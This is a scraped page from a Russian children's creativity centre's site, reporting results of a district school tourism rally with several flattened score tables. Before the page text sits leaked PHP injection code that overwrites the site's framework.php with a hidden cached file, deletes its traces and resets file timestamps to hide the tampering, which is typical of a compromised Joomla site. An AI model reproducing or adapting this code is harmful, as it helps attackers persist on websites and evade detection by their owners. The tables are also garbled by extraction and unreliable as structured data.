$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Районный турслет среди учащихся
МАУДО "Дом детского творчества п. Новосергиевка" Новосергиевского района Оренбургской области

Регистрация Вход

Зарегистрируйтесь, чтобы иметь возможность оставлять комментарии и скачивать фотографии из нашей "ФОТОГАЛЕРЕИ".



Спасибо за регистрацию.

План мероприятий

Сентябрь 2017
Пн Вт Ср Чт Пт Сб Вс
28 29 30 31 1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 1
Developed by JoomVision.com
Баннер

Районный турслет среди учащихся PDF Печать E-mail

     23 сентября в окресностях улицы Оренбургской состоялся туристический слет команд района среди школьников. Соревнования прошли по четырем дисциплинам: Пешеходная дистанция, Фигурное вождение велосипеда, Водный вид, Спортивное ориентирование. По результатам соревнований месста среди команд распределились следующим образом:

СВОДНЫЙ ПРОТОКОЛ

 

Команда

   Время прохождения дистанции

Отсечка

Штрафы на этапах (баллы)

Сумма

штраф

баллов

время

Результат

Место

завал

навесная

бревно

спуск

подъем

паралл

КП

кочки

Команды

Команды

Платовская

17,10

           

1

 

1

2

10

17,30

1

Кулагинская 1

23,42

                 

0

 

23,42

4

   Кр\полянская1

26,44

   

3

           

3

30

27,14

8

Рыбкинская

26,16

               

3

3

30

26,46

7

Кулагинская 2

28,28

               

5

5

50

29,18

10

Кувайская

22,26

         

6

     

6

1,00

23,26

3

Герасимовская

20,21

               

3

3

30

20,51

2

Хуторская

20,20

         

6

 

40

2

48

7,0

27,20

9

Кулагинская 3

23,43

                     

23,43

5

Сборная

33,53

               

4

4

40

34,53

12

НСОШ№3

30,54

   

3

         

3

6

1,0

31,54

11

Кр\полянская2

23,51

               

3

3

30

24,21

6

 

Гл. судья ___________/А.И.Девятаев/          Гл. секретарь ________/Л.К.Лыкова/

 


 

 

СВОДНЫЙ ПРОТОКОЛ

районного слета среди учащихся   23 сентября 2016 г.

 

 команда

Команда

Лично-коман-

дная ТД

велосипед

катамаран

  Сп.ориенти-рование

баллы

Место

 
 

1

Платовская

1

1

5

8

15

2

 

2

Кулагинская №1

4

3

1

7

15

3

 

3

Краснополянская1

8

6

8

6

28

7

 

4

Рыбкинская

7

3

11

5

26

6

 

5

Кулагинская 2

10

8

9

1

28

 

 

6

Кувайская

3

5

3

10

21

4

 

7

Герасимовская

2

2

2

2

8

1

 

8

Хуторская

9

4

6

11

30

8

 

9

Кулагинская 3

5

8

7

4

24

 

 

10

Сборная

12

8

12

5

37

 

 

11

НСОШ№3

11

7

4

3

25

5

 

12

Краснополянская 2

6

8

10

9

33

 

 

 

 

                         Гл. судья _____________/А.И.Девятаев/        

                           

                         Гл. секретарь  _____________/Л.К.Лыкова/

 

 


 

 

 СВОДНЫЙ ПРОТОКОЛ 

Спортивное ориентирование


команда

 

Команда

    время

Найдено КП

Место

личников

сумма

Место команды

 
 

1

Платовская СОШ

46

21,10

14

1

 

8

 

 

 

47

 

 

Сн 16

 

 

 

 

 

48

37,33

14

9

 

 

 

 

 

49

 

 

Сн 16

 

 

 

2

Кулагинская №1

3

1,01,39

15

8

 

7

 

 

 

9

1,00,36

15

7

 

 

 

 

 

15

 

 

Сн 16

 

 

 

 

 

21

38,09

14

10

 

 

 

3

Краснополянская1

6

42,09

14

14

 

6

 

 

 

12

1,14,56

10

Сн 16

 

 

 

 

 

18

30,38

12

4

 

 

 

 

 

24

53,30

15

5

 

 

 

4

Рыбкинская

4

46,12

12

7

 

5

 

 

 

10

45,14

12

6

 

 

 

 

 

16

42,37

8

Сн 16

 

 

 

 

 

22

36,03

14

7

 

 

 

5

Кулагинская 2

26

40,44

15

3

 

1

 

 

 

30

1,02,44

12

9

 

 

 

 

 

32

31,18

14

4

 

 

 

 

 

34

33,14

14

6

 

 

 

6

Кувайская

5

 

 

Сн 16

 

10

 

 

 

11

 

 

Сн 16

 

 

 

 

 

17

 

 

Сн 16

 

 

 

 

 

23

44,12

14

15

 

 

 

7

Герасимовская

39

1,24,00

15

9

 

2

 

 

 

41

27,30

15

2

 

 

 

 

 

43

28,40

14

2

 

 

 

 

 

45

39,31

14

12

 

 

 

8

Хуторская

2

1,16,02

9

Сн 16

 

11

 

 

 

8

1,15,06

10

Сн 16

 

 

 

 

 

14

 

 

Сн 16

 

 

 

 

 

20

 

 

Сн 16

 

 

 

9

Кулагинская 3

36

23,55

12

2

 

4

 

 

 

38

23,50

12

1

 

 

 

 

 

40

 

 

Сн 16

 

 

 

 

 

44

29,29

14

3

 

 

 

10

Сборная

25

 

 

Сн 16

 

5

 

 

 

29

51,22

15

4

 

 

 

 

 

27

32,19

14

5

 

 

 

 

 

31

36,36

12

5

 

 

 

11

НСОШ№3

1

1,28,28

15

10

 

3

 

 

 

7

39,23

14

11

 

 

 

 

 

13

53,47

15

6

 

 

 

 

 

19

39,58

14

13

 

 

 

12

Краснополянская 2

28

35,44

10

Сн 16

 

9

 

 

 

33

25,32

12

3

 

 

 

 

 

35

 

 

Сн 16

 

 

 

 

 

37

 

 

Сн 16

 

 

 
Личники    

 

Семенов ярослав

53

53,57

12

8

 

 

 

 

Барабанщиков макс

 

1,08,02

9

Сн 16

 

 

 

 

Гайсин шамиль

 

50,39

10

Сн 16

 

 

 

 

Родина наталья

54

36,45

14

14

 

 

 

 

Горюнов Дмитрий

42

25,47

15

1

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

СВОДНЫЙ ПРОТОКОЛ

районного слета среди учащихся   23 сентября 2016 г.

 

 команда

Команда

Лично-коман-

дная ТД

велосипед

катамаран

  Сп.ориенти-рование

баллы

Место

 
 

1

Платовская

1

1

5

8

15

2

 

2

Кулагинская №1

4

3

1

7

15

3

 

3

Краснополянская1

8

6

8

6

28

7

 

4

Рыбкинская

7

3

11

5

26

6

 

5

Кулагинская 2

10

8

9

1

28

 

 

6

Кувайская

3

5

3

10

21

4

 

7

Герасимовская

2

2

2

2

8

1

 

8

Хуторская

9

4

6

11

30

8

 

9

Кулагинская 3

5

8

7

4

24

 

 

10

Сборная

12

8

12

5

37

 

 

11

НСОШ№3

11

7

4

3

25

5

 

12

Краснополянская 2

6

8

10

9

33

 

 

 

 

 

 

 

 

 

                         Гл. судья _____________/А.И.Девятаев/        

                           

                         Гл. секретарь  _____________/Л.К.Лыкова/

 

 

_mg_0426

 

_mg_0782

 

_mg_0840

 

_mg_0891

 

Назад

Обновлено 28.09.2016 14:52